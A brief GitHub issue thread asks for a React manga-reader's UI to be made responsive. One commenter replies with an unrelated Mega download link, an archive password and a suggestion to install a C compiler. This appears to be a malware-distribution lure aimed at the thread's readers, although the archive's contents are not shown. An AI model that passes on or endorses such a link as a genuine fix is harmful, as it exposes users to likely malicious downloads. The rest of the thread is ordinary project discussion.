### ISSUE TITLE
make ui responsive

### ISSUE THREAD

**Issue by deborachoi3** [NiWong03/MangadexReact#11]
ui only works for desktop at the moment

**Comment by pinpolhoxx** [comment]
I think this will help you.
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Archive password: changeme

you may need to install the c compiler

**Comment by deborachoi3** [comment]
works for iphone xr and desktop
